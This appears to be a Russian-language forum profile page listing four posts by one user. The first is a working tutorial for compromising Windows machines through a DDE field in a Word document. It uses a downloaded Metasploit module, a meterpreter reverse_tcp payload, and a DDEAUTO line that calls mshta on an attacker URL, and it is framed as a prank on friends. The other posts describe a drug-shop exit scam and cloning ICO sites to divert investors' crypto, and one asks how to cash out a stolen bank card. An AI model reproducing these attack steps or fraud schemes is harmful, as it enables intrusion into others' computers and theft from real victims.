1 1 2 1 2

torx777

Постояльцы
  • Content Count

    7
  • Last visited

Community Reputation

0 Обычный
  1. Теория DDE exploit используется для динамического обмена данных. Эта уязвимость позволяет передавать данные между приложениями MS Office без взаимодействия между пользователями. Этот метод используется для получения доступа к системе. Можно легко отправить файл другу с данными его "переписки" и он с большим любопытством будет открывать этот файл) Установка Необходимые составляющие для проведения атаки: Устройство с Kali Linux. Устройство с Windows. Microsoft Office (Word). Все описанные действия проводились в Kali Linux. Для начала нам необходимо установить компоненты и добавить их в базу Metasploit. Сначала скачаем эксплоит с помощью команды: wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Далее добавим эту утилиту в папку с эксплоитами Metasploit: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ После этого можно переходить в msfconsole. Запускаем и производим обновления всех наших путей: msfconsole reload_all После этого можно переходить к генерации нашей полезной нагрузки. Для этого необходимо пошагово выполнять такие команды: use exploit/windows/dde_delivery Далее нам необходимо установить свой сервис чтобы принимать соединение, для этого нужно указать команду со своим IP адресом: set SRVHOST 192.168.177.141 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.177.141 set LPORT 6708 exploit exploit Подготавливаем документ MS Office После этого получаем ссылку, которую нужно вмонтировать в документ MS Office. Для этого переходим в раздел "Вставить"->"Быстрые элементы"->"Поле" (Можно использовать быструю комбинацию CTRL + F9). {DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe “http://192.168.1.6:8080/wi9o8uanVgkjv”} После открытия документа откроется сессия. После открытия будут два всплывающих окна. Но они без каких либо запретов, просто уведомления о наличии сторонних связей с другими приложениями. Готовая ссылка Получаем сессию Заключение Вот таким способом можно получить доступ к компьютеру. Дальше смотрите в сторону пост эксплуатации. Там есть очень много чего интересного. Любите своих друзей и не заставляйте их скучать. Можно пошутить вот таким простым, но эффективным способом. Также формулы можно использовать и в других программах MS Office. Для более правдоподобного вида нужно наполнять документы тематическим содержанием.
  2. Как же легко в наше время зарабатывать деньги! Я сам порой удивляюсь. У многих кишка тонка сделать первый шаг на пути к успеху, НО есть такие люди, которые на похуй влетают в авантюры и уламывают свой кусок пирога! Так к чему это я? Слышали про набирающий хайп однодневного нарко-бизнеса? Сейчас расскажу. Поведал мне вчера товарищ Истрию одного парня. Как он за одну неделю поднял около 500 000 т.р. ! Истрия следующая. Один парень зашёл на сайт по продаже наркоты и взял у продавца с большой репутацией 1 грамм скорости. Оплатил, пришёл за кладом, забрал. Дома разделил грамм на 5 частей и сделал 5 кладов. Потом зарегал магазин однодневку на другом сайте (типа гидра или легал). В честь открытия своего магазина он сделал небывалые скидки! На 200-300 рублей дешевле чем в других магазах. Потом он пишет авторитетным пользователям, что в его магазе ещё одна небывалая акция, и он за отзыв магазину даёт на пробу СК. И скидывает им место клада. Они его забирают и пишут просто нереальный отзыв за такую щедрость! Далее к нему пошёл большой поток клиентов. Поверьте, человек 30 ему точно написало. Он им отвечал, что через час курьер разнесёт калады и можно принимать заказы. Потом он скидывает им всем свой киви кошелёк. Собирает бабки и уделяет магазин. Жаловаться конечно же никто не будет в органы. Безопасность в сети он соблюдал. Вот и все, изи бабки!
  3. Не так давно стало популярным такое направление, как ICO - по сути это сбор инвестиций для проекта, только в криптовалюте. Компания вместо акций выпускает токены и продает их за криптовалюту, далее с ростом капитализации компании цена этих токенов растет, тем самым инвесторы зарабатывают. Сейчас такие ICO собирают Миллионы Долларов каждый день. Наша задача отхватить кусок от этого пирога. Краткая суть схемы: делаем копию сайта, ставим на него свои данные кошелька, получаем бабло. Если по порядку, то так: Выбор проекта донора Регистрация кошелька Копия сайта Запуск рекламы Получение баблишка Теперь поподробнее: Для начала нам нужно выбрать проект, который станет донором, список площадок, на которых можно посмотреть проекты: https://www.icoalert.com http://icorating.com https://icotracker.net https://tokenmarket.net https://www.ico-list.com https://icobazaar.com https://www.icocountdown.com Выбирать нужно только те, которые уже собирают инвестиции или скоро начнут. Заходим, смотрим что за проект, нужно чтобы сайт был приличный и вызывал доверие. Далее идем в раздел сбора денег, обычно это “Token sale”, “Contribute” и здесь смотрим в какой валюте они собирают бабло (Bitcoin, Ethereum … и т.д). Далее регаем себе кошелек в этой валюте, если еще его у вас нет. После того как выбрали проект, регистрируем домен похожий на название проекта. Затем необходимо сделать полную копию сайта, благо инструментов для этого хватает. Не забудьте удалить все счетчики и рекламные коды. После того как скопировали, вам нужно изменить некоторые данные на сайте, меняем все что касается адреса сайта на адрес своего сайта (обычно это почты). Теперь самое главное, идем в раздел покупки токенов (сбора денег) и здесь меняем адрес кошелька на свой, который зарегали изначально. Далее нам остается выгрузить сайт на хостинг и привязать домен. После того как сайт готов, запускаем рекламу в Google AdWords по брендовым запросам, т.е запросам содержащим название проекта. Примечание: Ключевики лучше включать в точном соответствии, иначе есть шанс слить бюджет. Почти сразу к нам на сайт польется трафик, причем трафик брендовый, поэтому будет хорошо конвертится. Еще пару советов, слишком крупные проекты не берите, они влювают бабок в рекламу немеренно, и по таким запросам рекламируются другие проекты, будете конкурировать еще и с ними. Также важно помнить, что рано или поздно вас спалят, и начнут писать жалобы хостеру и регистратору домена. Поэтому хостинг лучше использовать какой-нибудь трудный для связи, который по долгу не отвечает. Ну и регистрируем все на левые данные, а в домене скрываем свои данные.
  4. Можно ли обналить Сберовскую чипованную карту при наличии номера , имени холдера , даты окончания и CVV-кода ?